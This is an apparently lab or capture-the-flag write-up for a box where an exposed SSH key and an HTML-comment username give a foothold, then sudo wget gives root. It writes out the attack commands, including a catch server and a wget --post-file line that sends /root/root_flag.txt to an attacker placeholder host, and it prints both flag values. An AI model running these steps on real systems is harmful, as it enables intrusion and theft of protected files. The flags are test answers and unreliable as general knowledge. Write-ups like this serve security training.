Overview
A misconfigured web server leaks an SSH private key in a publicly accessible /.ssh/ directory. Username harvested from HTML comments. Privilege escalation via sudo wget NOPASSWD using --post-file to exfiltrate root-owned files.
Gobuster → /sitemap/ → HTML comment (username: jessie)
→ /sitemap/.ssh/id_rsa → SSH as jessie → user flag
→ sudo wget --post-file=/root/root_flag.txt → root flag
Reconnaissance
| Port | Service |
|---|---|
| 22/tcp | OpenSSH 7.2p2 |
| 80/tcp | Apache 2.4.18 |
Gobuster found /sitemap/. Page source contained:
<!-- Jessie don't forget to update the webiste -->Further enumeration found /sitemap/.ssh/id_rsa — SSH private key publicly exposed.
Foothold
wget http://TARGET/sitemap/.ssh/id_rsa
chmod 600 id_rsa
ssh -i id_rsa jessie@TARGET
cat ~/Documents/user_flag.txt USER: 057c67131c3d5e42dd5cd3075b198ff6
Privilege Escalation — sudo wget
sudo -l
# (root) NOPASSWD: /usr/bin/wgetwget --post-file sends a file's contents as POST body to any URL. Start a catch server, exfiltrate:
# Attacker: start catch server
node -e "require('http').createServer((q,r)=>{let b='';q.on('data',c=>b+=c);q.on('end',()=>{console.log(b);r.end()})}).listen(8888)"
# Target: exfil root flag
sudo wget --post-file=/root/root_flag.txt http://OUR_IP:8888/ -q ROOT: b1b968b37519ad1daa6408188649263d
Lessons Learned
- Always check
/.ssh/directories during web enumeration — exposed private keys are instant footholds. - HTML comments leak usernames. Real-world developers leave notes in source.
- sudo wget = file read as root.
--post-fileexfiltrates any file. Classic GTFOBins technique.